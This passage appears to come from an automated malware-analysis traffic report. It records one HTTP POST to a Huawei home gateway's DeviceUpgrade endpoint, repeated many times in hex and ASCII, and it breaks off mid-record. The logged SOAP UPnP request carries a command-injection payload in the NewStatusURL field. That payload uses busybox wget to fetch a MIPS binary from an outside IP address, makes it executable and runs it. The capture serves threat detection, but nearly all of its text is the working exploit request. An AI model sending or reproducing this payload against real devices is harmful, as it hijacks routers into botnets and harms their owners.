73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml 